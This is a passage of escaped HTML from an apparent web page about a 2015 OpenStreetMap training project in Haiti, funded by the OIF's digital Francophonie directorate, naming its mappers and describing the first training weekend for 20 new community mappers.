The mappers, who are also members of the collective action project, Projet Espace OSM Francophone (ProjetEOF), include Louino Robillard, Fran\u00e7ois-Xavier Lamure, Pierre B\u00e9land, Nicolas Chavent, Severin Menard, Delphine Bedu and Emilie Reiser.<\/p>\n<p>This project was designed with the Direction de la Francophonie Num\u00e9rique (DFN) of the Organisation Internationale de la Francophonie (OIF), funded by the DFN as part of its support program for the OSM project in 2015.\u00a0{0}It will be implemented in partnership with experts from the OSM collective and the Haitian Association{\/0} {1}Haiti Communitere{\/1} {2}(HC) in close coordination with the most active OSM mappers of the island, and the communities, groups, and associations with which they interact.{\/2}<br \/>\nThis support action is articulated around a capacity building program on the technical and organizational aspects of the OSM initiative in a voluntary or economic framework.The training is open to 20 new members of the OpenStreetMap community in Haiti.\u00a0{0}In conjunction, two more advanced mappers with the potential to play the role of facilitator for the OSM project will undergo a training to become trainers for teaching data, tools, methods, and practices for open-source mapping and by so doing play a role in maintaining and reinforcing OSM dynamics at work in the island. {\/0}<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Description of the organizational training.<\/strong><\/p>\n<p>This training program began on Saturday, November 7th and Sunday the 8th, 2015, with a presentation of OSM and the history of mapping practices in Haiti to 20 new members of the OSM community involved at community level.
